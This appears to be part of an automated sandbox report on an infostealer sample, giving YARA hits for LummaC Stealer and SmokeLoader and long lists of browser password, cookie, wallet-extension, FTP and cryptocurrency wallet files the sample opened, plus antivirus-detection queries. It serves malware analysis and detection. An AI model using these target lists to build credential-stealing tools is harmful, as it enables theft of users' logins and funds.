Source: vm.exe, 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: vm.exe, 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: procexp.exe
Source: vm.exe, 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 8.2.34CA.exe.7ff65b6b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.34CA.exe.7ff65b6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.2466826859.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2601744896.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 34CA.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\34CA.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 4936, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: 34CA.exe	String found in binary or memory: 61azMCvCJTGgpqseAkDulivzcEIzbUh6GMdTZAHnf1fdOpeVIX1cvVM4A8eZYfeoEwKiaYuvGzYIFP83bjKF7m6bj2wJAxxEhOliTXiwSEw/wKfyExx0wSCYqAXlH96eBExAmJxHEi07ZRDCnO0inYh1kTLelXIq6GhRN/GAUttG+NG6k9KosqFAP0KhGV9rw2I72LM/52rDcmE4tf+MyZ2GCqyJk4LOJJPPBz+M/3bNhSXwcNXMQCxo38kKghYrUGlK
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletS
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletS
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binanceg
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: BitLockerToGo.exe, 0000000D.00000003.2613784729.000000000300D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BD9E.exe, 0000000A.00000002.2843609071.000001DCCE2D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $'{0}' is not a valid KeyStore name.
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger LiveS

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
